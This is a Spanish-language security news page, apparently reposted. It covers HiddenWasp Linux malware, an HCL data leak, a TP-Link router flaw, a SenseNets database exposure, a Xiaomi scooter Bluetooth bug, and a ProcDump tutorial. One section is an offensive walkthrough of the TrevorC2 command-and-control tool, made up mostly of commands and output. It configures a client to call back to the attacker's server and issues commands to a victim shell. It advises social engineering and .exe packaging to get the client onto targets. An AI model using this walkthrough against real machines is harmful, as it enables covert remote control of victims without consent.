Mobile Security

HIDDENWASP, UN PELIGROSO MALWARE QUE AFECTA SISTEMAS LINUX

Posted on

ORIGINAL CONTENT: https://noticiasseguridad.com/malware-virus/hiddenwasp-un-peligroso-malware-que-afecta-sistemas-linux/

A pesar de que no son poco comunes, especialistas en seguridad en redes mencionan que los riesgos de seguridad presentes en sistemas Linux no son tratados de forma suficientemente amplia. Ya sea por su naturaleza poco ofensiva o porque los mecanismos de seguridad de estos sistemas los pasan por alto, estas amenazas de seguridad no reciben tanta difusión como las que impactan a los sistemas Windows.

No obstante, se ha vuelto algo común detectar malware con capacidades de evasión altamente desarrolladas utilizando código abierto ya existente presente en algunas implementaciones más allá de los sistemas Windows. La firma de seguridad en redes Intezer ha reportado recientemente el hallazgo de una nueva variante de malware conocida como HiddenWasp.

Acorde a los especialistas de la compañía, HiddenWasp es una amenaza de ciberseguridad que debe ser atendida pues, después de algunos análisis, se ha concluido que cuenta con una tasa de detección del 0% en los sistemas de detección de malware más utilizados en el mundo.

Acorde a los expertos en seguridad en redes, la infección del malware de Linux HiddenWasp requiere la ejecución de un script inicial. En la investigación, los expertos descubrieron que el script se vale de un usuario llamado ‘sftp’ con una contraseña bastante segura; además, el script limpia el sistema para deshacerse de versiones anteriores del malware en caso de que una infección se hubiera presentado anteriormente.

Posteriormente, se descarga un archivo en la máquina comprometida desde el servidor que contiene todos los componentes, incluyendo el troyano y el rootkit. El script también agrega un binario troyano en la ubicación /etc/rc.local para funcionar incluso después de hacer reboot en el sistema.

Los especialistas del Instituto Internacional de Seguridad Cibernética (IICS) han encontrado diversas similitudes entre el rootkit de HiddenWasp y el del malware Azazel, además de compartir algunos fragmentos de cadena con el malware ChinaZ y el de la botnet Mirai. “Gracias a HiddenWasp, los hackers pueden ejecutar comandos en el terminal de Linux, ejecutar archivos, descargar scripts adicionales, y más”, agregan los expertos.

A pesar de que la investigación logró algunos hallazgos, los expertos aún desconocen el vector de ataque empleado por los hackers para infectar los sistemas Linux, aunque una versión posible es que los atacantes hayan desplegado el malware desde algunos sistemas que ya se encontraban bajo su control. “HiddenWasp podría tratarse de una segunda etapa de ataque”, concluyeron los expertos.

Advertisements

BRECHA DE DATOS EXPONE INFORMACIÓN CONFIDENCIAL EN HCL, COMPAÑÍA DE TI

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/hacking-incidentes/brecha-de-datos-expone-informacion-confidencial-en-hcl-compania-de-ti/

Especialistas en auditoría informática reportan que HCL, importante compañía de servicios de TI, dejó expuestas en línea las contraseñas de sus empleados, entre otros datos, como información confidencial relacionada con proyectos de sus clientes.

Según los reportes, un portal en línea del área de recursos humanos de la compañía expuso nombres de empleados de reciente ingreso, nombres de usuario en la plataforma y contraseñas en texto simple. Acorde a la compañía, el sitio se mantuvo activo durante la exposición de los datos, comprometiendo los accesos de alrededor de 54 empleados.

El perfil completo de los empleados comprometidos incluye información como:

  • Nombre completo del empleado
  • Número telefónico
  • Fecha de ingreso a la compañía
  • Código SAP del reclutador

Los datos expuestos podrían haber sido empleados por hackers maliciosos para iniciar sesión en los sistemas de la compañía, acceder a sistemas sensibles e incluso tomar control de las cuentas de email de los empleados para desplegar campañas de phishing contra otros empleados, comentan los expertos en auditoría informática

Este incidente pudo haber expuesto propiedad intelectual confidencial tanto de la compañía como de sus clientes; regularmente, esta información es tratada como secreto comercial, por lo que el acceso a la información resguardada por HCL puede ser realmente útil para clientes y competidores.

Un portavoz de la compañía declaró: “En HCL nos tomamos muy en serio la seguridad de la información. Apenas descubrimos este incidente de seguridad, tomamos las medidas pertinentes para resolver el problema a la brevedad. Además, nuestros equipos de seguridad realizarán una revisión exhaustiva para saber qué pasó exactamente y prevenir que vuelva a ocurrir.

Acorde a los especialistas en auditoría informática, SmartManage, un portal de HCL para compartir información sobre proyectos de la compañía con sus clientes también fue comprometido, exponiendo información como:

  • Análisis internos
  • Informes de productividad
  • Informes de instalaciones de software

Recientemente, especialistas del Instituto Internacional de Seguridad Cibernética (IICS) reportaron un serio incidente de seguridad en Wipro, uno de los mayores competidores de HCL; durante este incidente, los hackers se apoderaron de los sistemas de Wipro para lanzar ataques contra algunos de los clientes de la compañía. Por ahora no existe evidencia para probar que algo similar sucedió en HCL, aunque la posibilidad no debe ser descartada.

VULNERABILIDAD DÍA CERO EN ENRUTADORES TP-LINK EXPONE LOS DISPOSITIVOS A CIBERATAQUES

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/vulnerabilidad-dia-cero-en-enrutadores-tp-link-expone-los-dispositivos-a-ciberataques/

Dos modelos de enrutadores TP-Link están expuestos a la explotación de una vulnerabilidad día cero que permite a los usuarios maliciosos tomar control de los dispositivos, reportan especialistas de la escuela de hackers éticos del Instituto Internacional de Seguridad Cibernética (IICS).

“Hemos descubierto una vulnerabilidad día cero que compromete el funcionamiento del dispositivo, exponiéndolo a ataques remotos”, menciona Grzegroz Wypych, especialista en ciberseguridad. La compañía ha reportado que los modelos de enrutadores comprometidos han sido descontinuados, no obstante, buscando en línea aún se pueden encontrar estos dispositivos disponibles para su compra.

Acorde a los expertos de la escuela de hackers éticos, después de que ambos modelos de enrutador fueron analizados se descubrió que las vulnerabilidades se encuentran vinculadas al panel de control web utilizado para configurar el enrutador. “Los controles que se encuentran en la interfaz web realmente no protegen al enrutador ‘real’, lo que hace las cosas mucho más fáciles para los hackers”, agregaron los expertos.

Uno de los posibles vectores de ataque puede ser cuando un usuario envía solicitudes ping, a continuación se mostrará un mensaje en la consola del dispositivo referente al código nativo compilado al binario del firmware. Después de realizar una serie de pasos (realmente complejos) es posible generar las condiciones adecuadas para un ataque de desbordamiento de búfer. “Sin entrar en detalles, esta es una vulnerabilidad de desbordamiento de búfer clásica”, mencionaron los investigadores.

Acorde a los especialistas de la escuela de hackers éticos, las actualizaciones de TP-Link fueron lanzadas desde mediados del mes de marzo y aplican para los dos modelos de enrutador vulnerables. Los usuarios de TL-WR940N deberán actualizar a TL-WR940Nv3; por otra parte, los usuarios de TL-WR940Nv3 deberán actualizar a TL-WR941NDv6.

Los investigadores sostienen que la mayoría de los fabricantes de estos dispositivos firman contratos de outsourcing con desarrolladores de firmware de bajo costo, inseguro y sin controles de calidad. Por si fuera poco, esta clase de desarrolladores no lanza actualizaciones de software con regularidad, o no las lanza en absoluto.

TOMAR CONTROL DE CUALQUIER CUENTA DE USUARIO USANDO TREVORC2

Posted on

trevorc00

Hackear es cada día más fácil, pues siempre habrá muchos profesionales de seguridad independientes que están desarrollando herramientas funcionales. Estas herramientas son muy fáciles de usar, el usuario sólo necesita aprender algunos comandos básicos. Hoy le mostraremos cómo una herramienta llamada Trevorc2 puede recopilar detalles de su objetivo con solamente un clic.

Según investigadores en seguridad en redes del Instituto Internacional de Seguridad Cibernética, Travorc2 es una herramienta bastante impresionante, ya que proporciona un nivel inicial de detalles del objetivo para enumerar más tarde.

Trevorc2 es una herramienta de comando y control escrita por Dave Kennedy. Esta herramienta puede interactuar con diferentes shells a la vez. El objetivo puede cambiar fácilmente entre diferentes shells. La herramienta proporciona algunas funcionalidades básicas para la recopilación de información del objetivo.

Trevorc2 contiene principalmente dos elementos:

  • Trevorc2 Server: cuando se inicia el servidor, el servidor clonará la URL. El servidor es accesible para cualquier persona y parece un sitio web real. Trevor2 Server contiene las instrucciones con el cliente
  • Trevorc2 Client: se utilizará para ejecutar en la máquina objetivo. El servidor creará una sesión con el cliente. Aquí el cliente enviará datos básicos en parámetros de cadena al servidor

SCENARIO

Trevorc2 Server (192.168.1.102) <======================> Trevorc2 Client(192.168.1.9)

Instalación de Trevorc2

  • La herramienta ha sido probada usando Kali Linux 2018.4, donde el atacante era Kali Linux y el objetivo era Windows 7 Enterprise 32 Bit
  • Trevorc2 Server = Kali Linux 2018.4
  • Trevorc2 Client = Windows 7 Enterprise 32 Bit
  • En Kali Linux, para descargar la herramienta teclee git clone https://github.com/trustedsec/trevorc2.git
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/trustedsec/trevorc2.git
 Cloning into 'trevorc2'…
 remote: Enumerating objects: 137, done.
 remote: Total 137 (delta 0), reused 0 (delta 0), pack-reused 137
 Receiving objects: 100% (137/137), 45.57 KiB | 195.00 KiB/s, done.
 Resolving deltas: 100% (78/78), done.
  • Escriba cd trevorc2 y escriba ls
root@kali:/home/iicybersecurity/Downloads# cd trevorc2
 root@kali:/home/iicybersecurity/Downloads/trevorc2# ls
 CHANGELOG.txt  Dockerfile   README.md         trevorc2_client.cs   trevorc2_client.py
 CREDITS.txt    LICENSE.txt  requirements.txt  trevorc2_client.ps1  trevorc2_server.py
  • Escriba pip install -r requirements.txt
root@kali:/home/iicybersecurity/Downloads/trevorc2# pip install -r requirements.txt
 DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
 Collecting bleach (from -r requirements.txt (line 1))
   Downloading https://files.pythonhosted.org/packages/ab/05/27e1466475e816d3001efb6e0a85a819be17411420494a1e602c36f8299d/bleach-3.1.0-py2.py3-none-any.whl (157kB)
     100% |████████████████████████████████| 163kB 580kB/s
 Requirement already satisfied: tornado in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 2)) (5.1.1)
 Requirement already satisfied: pycrypto in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 3)) (2.6.1)
 Requirement already satisfied: six>=1.9.0 in /usr/lib/python2.7/dist-packages (from bleach->-r requirements.txt (line 1)) (1.11.0)
 Requirement already satisfied: webencodings in /usr/lib/python2.7/dist-packages (from bleach->-r requirements.txt (line 1)) (0.5)
 Installing collected packages: bleach
 Successfully installed bleach-3.1.0
  • Escriba nano trevorc2_client.py
  • Ingrese su IPv4 en el trevorc2_client.py
root@kali:/home/iicybersecurity/Downloads/trevorc2# nano trevorc2_client.py
 !/usr/bin/env python
 #
 TrevorC2 - legitimate looking command and control
 Written by: Dave Kennedy @HackingDave
 Website: https://www.trustedsec.com
 GIT: https://github.com/trustedsec
 #
 This is the client connection, and only an example. Refer to the readme
 to build your own client connection to the server C2 infrastructure.
 CONFIG CONSTANTS:
 site used to communicate with (remote TrevorC2 site)
 SITE_URL = ("http://192.168.1.102") <-Enter IPv4 address->
  • Edite trevorc2_server.py para ingresar al sitio de clonación. El sitio se clonará automáticamente cuando se inicie el servidor

Ejecución de Trevorc2 en el servidor

  • Escriba nano trevorc2_server.py
  • Introduzca la URL que desea clonar. Por defecto es http://www.google.com
root@kali:/home/iicybersecurity/Downloads/trevorc2# nano trevorc2_server.py
 !/usr/bin/env python
 """
 TrevorC2 - legitimate looking command and control.
 Written by: Dave Kennedy @HackingDave
 Website: https://www.trustedsec.com
 GIT: https://github.com/trustedsec
 This is the server side which will clone a website of your choosing. Once
 the site is cloned, it'll place information inside the source of the html
 to be decoded by the client and executed and then passed back to the server
 via a query string parameter.
 """
 CONFIG CONSTANTS:
 URL = ("https://www.google.com") <-Enter Your Clone URL ->  # URL to clone to house a legitimate website
  • Escriba nano trevorc2_client.ps1
root@kali:/home/iicybersecurity/Downloads/trevorc2# nano trevorc2_client.ps1
 #
 TrevorC2 - legitimate looking command and control
 Written by: Dave Kennedy @HackingDave
 Website: https://www.trustedsec.com
 GIT: https://github.com/trustedsec
 PowerShell Module by Alex Williams @offsec_ginger
 #
 This is the client connection, and only an example. Refer to the readme
 to build your own client connection to the server C2 infrastructure.
 CONFIG CONSTANTS:
 Site used to communicate with (remote TrevorC2 site)
 $SITE_URL = "http://192.168.1.102" <-Enter IPv4 Address->
  • Después de hacer toda la configuración, escriba python trevorc2_server.py
  • Escriba python trevorc2_server.py
root@kali:/home/iicybersecurity/Downloads/trevorc2# python trevorc2_server.py
           ,  .'''''.  ...    ''''',  .'
            ','     ,.MMMM;.;'      '.
             ;;    ;MMMMMMMMM;     ;;'
            :'M:  ;MMMMMMMMMMM;.  :M':
            : M:  MMMMMMMMMMMMM:  :M  .
           .' M:  MMMMMMMMMMMMM:  :M. ;
           ; :M'  :MMMMMMMMMMMM'  'M: :
           : :M: .;"MMMMMMMMM":;. ,M: :
           :  ::,MMM;.M":::M.;MMM ::' :
         ,.;    ;MMMMMM;:MMMMMMMM:    :,.
         MMM.;.,MMMMMMMM;MMMMMMMM;.,;.MMM
         M':''':MMMMMMMMM;MMMMMMMM: "': M
         M.:   ;MMMMMMMMMMMMMMMMMM;   : M
         :::   MMMMMMMMMMM;MMMMMMMM   ::M
        ,'';   MMMMMMMMMMMM:MMMMMMM   :'".
      ,'   :   MMMMMMMMMMMM:MMMMMMM   :   '.
     '     :  'MMMMMMMMMMMMM:MMMMMM   ;     '
     ,.....;.. MMMMMMMMMMMMM:MMMMMM ..:....;.
     :MMMMMMMM MMMMMMMMMMMMM:MMMMMM MMMMMMMM:
     :MM''':"" MMMMMMMMMMMMM:MMMMMM "": "'MM:
      MM:   :  MMMMMMMMMMMMM:MMMMMM  ,'  :MM
      'MM   :  :MMMMMMMMMMMM:MMMMM:  :   ;M:
       :M;  :  'MMMMMMMMMMMMMMMMMM'  :  ;MM
       :MM. :   :MMMMMMMMMM;MMMMM:   :  MM:
        :M: :    MMMMMMMMM'MMMMMM'   : :MM'
        'MM :    "MMMMMMM:;MMMMM"   ,' ;M"
         'M  :    ""''':;;;'''""    :  M:
         ;'  :     "MMMMMMMM;."     :  "".
       ,;    :      :MMMMMMM:;.     :    '.
      :'     :    ,MM'''""''':M:    :     ';
     ;'      :    ;M'         MM.   :       ;.
   ,'        :    "            "'   :        '.
   '        :'                       '        ''
 .          :                        '          '
'          ;                          ;          '
          ;                            '


                   #TrevorForget
TrevorC2 - Legitimate Website Covert Channel
 Written by: David Kennedy (@HackingDave)
 https://www.trustedsec.com
 [] Cloning website: https://www.google.com /usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:791: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html   InsecureRequestWarning) [] Site cloned successfully.
 [] Starting Trevor C2 Server… [] Next, enter the command you want the victim to execute.
 [] Client uses random intervals, this may take a few. [] Type help for usage. Example commands, list, interact.
 trevorc2>
  • Después de ejecutar la consulta anterior se iniciará Trevorc2 Server. El servidor clonará la URL dada
  • Ahora abra travorc2_client.py en la máquina de destino
  • En el escenario real, puede utilizar algún hack de ingeniería social para abrir el travorc2_client.py en la máquina objetivo y el atacante en el escenario real convertirá el archivo .py en un archivo exe y, mediante el uso de ingeniería social, transfiera este archivo al objetivo

Ejecución de Trevorc2 en el objetivo

  • Python 2.7 debe estar instalado y las variables de entorno deben estar configuradas para ejecutar travorc2
  • Para configurar el Python PATH environment vaya a: https://www.python.org/download/releases/2.7/
  • Luego, abra Propiedades de Mi PC> Configuración avanzada del sistema> Variables de entorno> Variables del sistema
  • Haga clic en Nuevo e ingrese el Nombre de la variable: path\to\your\python\installed
  • Después de instalar python, escriba python travorc2_client.py. Después de ejecutar, si muestra el error “no se encontró ningún módulo llamado crypto”, teclee pip instal Crypto
  • Abra cmd en la máquina Windows. Escribapython travorc2_client.py
  • Después de ejecutar el travorc2_client.py en la máquina de destino, se creará una sesión en travorc2_server.py
trevorc2>
 *** Received connection from 192.168.1.9 and hostname iicybersecurity for TrevorC2.
  • En el servidor, escriba interact 1
trevorc2>interact 1
 [] Dropping into trevorc2 shell… [] Use exit or back to select other shells
 iicybersecurity:trevorc2>
 [*] Waiting for command to be executed, be patient, results will be displayed here…
 [*] Received response back from client…
 =-=-=-=-=-=-=-=-=-=-=
 (HOSTNAME: iicybersecurity
 CLIENT: 192.168.1.9)
  • En el servidor, escriba ipconfig
iicybersecurity:trevorc2>ipconfig
 [] Waiting for command to be executed, be patient, results will be displayed here… [] Received response back from client…
 =-=-=-=-=-=-=-=-=-=-=
 (HOSTNAME: iicybersecurity
 CLIENT: 192.168.1.9)
 Windows IP Configuration
 Ethernet adapter Local Area Connection:
 Connection-specific DNS Suffix  . :
    Link-local IPv6 Address . . . . . : fe80::d50d:a1db:69e0:318%10
    IPv4 Address. . . . . . . . . . . : 192.168.1.9
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%10
                                        192.168.1.1
 Tunnel adapter isatap.{E810D803-96C4-4AE3-8321-69E2FC60FE1B}:
 Media State . . . . . . . . . . . : Media disconnected
    Connection-specific DNS Suffix  . :
 Tunnel adapter 6TO4 Adapter:
 Media State . . . . . . . . . . . : Media disconnected
    Connection-specific DNS Suffix  . :
  • Después de ejecutar la consulta anterior, la máquina atacante ha reunido IPv4 del objetivo

Convertir archivos Python maliciosos a .EXE

  • Para convertir el trevorc2_client.py en .exe para abrir en una computadora de Windows fácilmente
  • Escriba pip install auto-py-to-exe
  • Vaya a la ubicación donde ha copiado trevorc2_client.py
  • Escriba auto-py-to-exe en cmd
  • Luego, auto-py-to-exe comenzará a seleccionar trevorc2_client.py y haga clic en convert py-to-exe
  • Después de convertir trevorc2.exe está listo para ejecutarse en una computadora con Windows
  • Antes de ejecutar copie todos los contenidos en la computadora de Windows para ejecutar el archivo exe
  • Abrir archivo a través de usar CMD. Escriba trevorc2_client.exe
  • Esto abrirá la sesión en el extremo del servidor

CHINA EXPONE DATOS DE MILLONES DE CIUDADANOS

Posted on

chinahack

La información filtrada se encontraba en una base de datos perteneciente a una empresa dedicada al desarrollo de software de seguridad y vigilancia

Especialistas en seguridad en redes del Instituto Internacional de Seguridad Cibernética reportan el hallazgo de una base de datos sin asegurar, incidente que expuso detalles personales de más de 2 millones de residentes de China.

El gobierno chino ha sido blanco de críticas, entre otras razones, debido al uso de cámaras de reconocimiento facial para monitorear los movimientos de millones de pobladores uigures en la provincia de Xinjiang.

Expertos en seguridad en redes revelaron la filtración en días recientes. La base de datos encontrada incluía nombres, números de identidad de ciudadanos, fechas de nacimiento, entre otros detalles personales.

“Hay una empresa china llamada SenseNets, dedicada al desarrollo de software de seguridad basado en inteligencia artificial para realizar reconocimiento facial, análisis de multitudes y verificación personal. Cualquier persona puede acceder a su IP comercial y a millones de registros acumulados de esta labor de recolección de información”, menciona uno de los especialistas encargados de la investigación.

Acorde a los expertos, la base de datos contiene más de 2 millones 500 mil registros de personas; la base de datos habría permanecido expuesta alrededor de 24 horas continuas, agregaron los expertos.

La base de datos original se dejó expuesta sin una sola medida de autenticación; los especialistas en seguridad en redes afirman que, hasta ahora, los intentos de SenseNets por mitigar el incidente han resultado infructuosos.

“Aunque los equipos de SenseNets trataron de actualizar su software Windows Server 2012, apagaron el firewall en el proceso, lo que deja vulnerable su servidor MongoDG y MySQL de nueva cuenta”, comentaron los expertos.

Los especialistas advierten que aunque esta información filtrada está bloqueada para la mayoría de los usuarios fuera de territorio chino, el material sí es accesible desde el interior del país. “Con un proxy chino es fácil acceder a la base de datos”.

Además de tratarse de un serio problema de seguridad informática, este incidente es una muestra más de la estricta política de vigilancia que ha implementado el gobierno de Xi Jinping, quien está dispuesto a espiar cada detalle de la existencia de las personas consideradas como riesgosas para la seguridad de China.

Algunos expertos han mostrado su preocupación por la frecuencia con la que estos incidentes se presentan: “A veces, la mayoría de los datos encontrados en estas bases no tiene tanto valor. Sin embargo, cuando también se encuentran detalles como números de identificación de ciudadanos, es posible elaborar perfiles detallados de las personas afectadas, lo que es muy útil en diversas actividades maliciosas, como fraudes de identidad”, concluyeron los expertos.

VULNERABILIDAD EN SCOOTERS DE XIAOMI PODRÍA PONER EN RIESGO LA VIDA DEL USUARIO

Posted on

scooter

El error permite el envío de comandos no autenticados vía Bluetooth al scooter

Aunque el uso de dispositivos inteligentes ha simplificado muchas labores cotidianas, especialistas en seguridad en redes también destacan que confiar demasiado en un equipo inseguro podría resultar perjudicial para los usuarios, llegando incluso a comprometer su integridad física.

Este parece ser el caso de los scooters eléctricos. Acorde a un grupo de investigadores, una vulnerabilidad crítica y muy fácil de explotar ha sido descubierta en el M365 Folding Electric Scooter del fabricante chino Xiaomi. Según los expertos en seguridad en redes, la explotación de este error podría poner en riesgo la vida del usuario.

El scooter eléctrico de Xiaomi cuenta con un mercado considerable y es utilizado por otras compañías, implementando algunas modificaciones con permiso de la empresa china.

El M365 debe ser vinculado a una app vía Bluetooth, enlace protegido mediante una contraseña, con lo que los usuarios pueden acceder a funciones como habilitar el sistema anti robo, actualizaciones del sistema, activar diversos modos de usuario y acceso a estadísticas de uso del scooter.

Acorde a los expertos en seguridad en redes, una validación de contraseña incorrecta en el scooter permite a un atacante enviar comandos no autenticados vía Bluetooth sin necesidad de usar la contraseña del usuario. El ataque puede realizarse a una distancia de hasta 100 metros.

“Descubrimos que la contraseña no se está usando de la forma correcta en el proceso de autenticación cuando la app es vinculada con el scooter, por lo que cualquier comando puede ser ejecutado sin la contraseña”, mencionó Rani Idan, especialista en ciberseguridad.

Si la vulnerabilidad es explotada con éxito, un hacker podría realizar diversas acciones maliciosas, como:

  • Bloqueo del scooter: Un atacante podría bloquear repentinamente cualquier scooter, incluso si está en movimiento; algo parecido a un ataque DDoS
  • Despliegue de malware: La app del M365 permite al usuario actualizar el firmware del scooter vía remota, por lo que un atacante podría entregar un firmware malicioso que le permita tomar control del scooter
  • Ataques dirigidos: Los atacantes podrían hacer que un scooter acelere o frene repentinamente

Los investigadores realizaron una prueba de concepto para demostrar algunos de los posibles escenarios. Para ello, desarrollaron una app que busca scooters M365 cercanos y los bloquea mediante el uso de la función anti robo, sin necesidad de interacción de la víctima.

OBTENER DETALLES OCULTOS DE CUALQUIER PROCESO DE LINUX USANDO PROCDUMP

Posted on Updated on

Los volcados de núcleo o volcados de memoria se crean cuando se ejecuta el programa. Un volcado consiste en módulos o flujos de trabajo que funcionan como funciona el programa. En la mayoría de los casos, los volcados se utilizan para copias de seguridad de archivos y directorios. Contiene una memoria de procesamiento de imágenes de las aplicaciones. A veces, cuando un proceso se cierra de forma inesperada, el sistema operativo crea un volcado de memoria. Ese volcado de memoria guarda toda la información de cómo funcionaba el proceso. Hoy estamos hablando de una herramienta llamada PROCDUMP.

Un investigador de seguridad en redes del Instituto Internacional de Seguridad Cibernética dice que PROCDUMP es útil para descargar y analizar cualquier proceso que se ejecute en Linux.

PROCDUMP es una herramienta creada por desarrolladores de Microsoft desde la suite sysinternal que recientemente se ha integrado en Linux. Esta herramienta crea volcados de procesos en ejecución en Linux. La herramienta se construyó utilizando las bibliotecas de Microsoft, ya que esta herramienta es un nuevo diseño de la herramienta de Microsoft llamada PROCDUMP que se ejecuta en cmd. Es una utilidad gratuita creada por Microsoft que ayuda en la depuración de Windows pero poco después también se creó para Linux. Para las pruebas hemos utilizado Ubuntu 16.04.

root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/Microsoft/ProcDump-for-Linux.git
 Cloning into 'ProcDump-for-Linux'…
 remote: Enumerating objects: 303, done.
 remote: Total 303 (delta 0), reused 0 (delta 0), pack-reused 303
 Receiving objects: 100% (303/303), 272.61 KiB | 261.00 KiB/s, done.
 Resolving deltas: 100% (170/170), done.
 Checking connectivity… done.
  • Luego escriba cd ProcDump-for-Linux
  • Luego escriba sudo apt-get update y sudo apt-get install procdump
  • Escriba sudo sh -c ‘echo “deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-ubuntu-xenial-prod xenial main” > /etc/apt/sources.list.d/microsoft.list’
  • El comando anterior agrega la clave pública de Microsoft Feed Manager
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux#  
sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-ubuntu-xenial-prod xenial main" > /etc/apt/sources.list.d/microsoft.list' 
 The program 'curl' is currently not installed. You can install it by typing:
 apt install curl
 gpg: no valid OpenPGP data found.
  • Si se muestra el error anterior, escriba sudo apt-get update y luego escriba sudo apt-get install curl
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux# apt-get install curl
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 Some packages could not be installed. This may mean that you have
 requested an impossible situation or if you are using the unstable
 distribution that some required packages have not yet been created
 or been moved out of Incoming.
 The following information may help to resolve the situation:
The following packages have unmet dependencies:
  curl : Depends: libcurl3-gnutls (= 7.47.0-1ubuntu2) but 7.47.0-1ubuntu2.8 is to be installed
 E: Unable to correct problems, you have held broken packages.
  • Si se muestra el error anterior, escriba sudo apt-get install libcurl3-gnutls=7.47.0-1ubuntu2
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux# sudo apt-get install libcurl3-gnutls=7.47.0-1ubuntu2
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following packages will be DOWNGRADED:
   libcurl3-gnutls
 0 upgraded, 0 newly installed, 1 downgraded, 0 to remove and 0 not upgraded.
 Need to get 183 kB of archives.
 After this operation, 2,048 B disk space will be freed.
 Do you want to continue? [Y/n] Y
 Get:1 http://us.archive.ubuntu.com/ubuntu xenial/main amd64 libcurl3-gnutls amd64 7.47.0-1ubuntu2 [183 kB]
 Fetched 183 kB in 3s (60.2 kB/s)
 dpkg: warning: downgrading libcurl3-gnutls:amd64 from 7.47.0-1ubuntu2.8 to 7.47.0-1ubuntu2
 (Reading database … 184169 files and directories currently installed.)
 Preparing to unpack …/libcurl3-gnutls_7.47.0-1ubuntu2_amd64.deb …
 Unpacking libcurl3-gnutls:amd64 (7.47.0-1ubuntu2) over (7.47.0-1ubuntu2.8) …
 Processing triggers for libc-bin (2.23-0ubuntu10) …
 Setting up libcurl3-gnutls:amd64 (7.47.0-1ubuntu2) …
 Processing triggers for libc-bin (2.23-0ubuntu10) …
  • Luego escriba sudo apt-get install curl
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux# sudo apt-get install curl
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following NEW packages will be installed:
   curl
 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
 Need to get 138 kB of archives.
 After this operation, 337 kB of additional disk space will be used.
 Get:1 http://us.archive.ubuntu.com/ubuntu xenial/main amd64 curl amd64 7.47.0-1ubuntu2 [138 kB]
 Fetched 138 kB in 2s (57.5 kB/s)
 Selecting previously unselected package curl.
 (Reading database … 184169 files and directories currently installed.)
 Preparing to unpack …/curl_7.47.0-1ubuntu2_amd64.deb …
 Unpacking curl (7.47.0-1ubuntu2) …
 Processing triggers for man-db (2.7.5-1) …
 Setting up curl (7.47.0-1ubuntu2) …
  • Escriba procdump –h
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux# procdump -h
 ProcDump v1.0.1 - Sysinternals process dump utility
 Copyright (C) 2017 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
 Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi
 Monitors a process and writes a dump file when the process exceeds the
 specified criteria.
 Usage: procdump [OPTIONS…] TARGET
    OPTIONS
       -h          Prints this help screen
       -C          CPU threshold at which to create a dump of the process from 0 to 100 * nCPU
       -c          CPU threshold below which to create a dump of the process from 0 to 100 * nCPU
       -M          Memory commit threshold in MB at which to create a dump
       -m          Trigger when memory commit drops below specified MB value.
       -n          Number of dumps to write before exiting
       -s          Consecutive seconds before dump is written (default is 10)
       -d          Writes diagnostic logs to syslog
    TARGET must be exactly one of these:
       -p          pid of the process
  • Escriba sudo procdump -p 1409
  • -p se utiliza para introducir el ID del proceso
  • Para obtener la id de los procesos escriba ps -ef o ps para ver qué proceso se está ejecutando en el sistema Linux
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux# sudo procdump -p 1409
 ProcDump v1.0.1 - Sysinternals process dump utility
 Copyright (C) 2017 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
 Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi
 Monitors a process and writes a dump file when the process exceeds the
 specified criteria.
 Process:  Xorg (1409)
 CPU Threshold:  n/a
 Commit Threshold: n/a
 Threshold Seconds: 10
 Number of Dumps: 1
 Press Ctrl-C to end monitoring without terminating the process.
 [00:26:04 - INFO]: Core dump 1 generated: Xorg_time_2019-01-25_21:09:07.1409
  • Después de ejecutar la consulta anterior, PROCDUMP ha creado un archivo de volcado. El archivo de volcado estará en el mismo directorio donde está instalada la herramienta
  • Si abre archivos escribiendo cat Xorg_time_2019-01-25_21:09:07.1409 se abrirán de la siguiente forma:
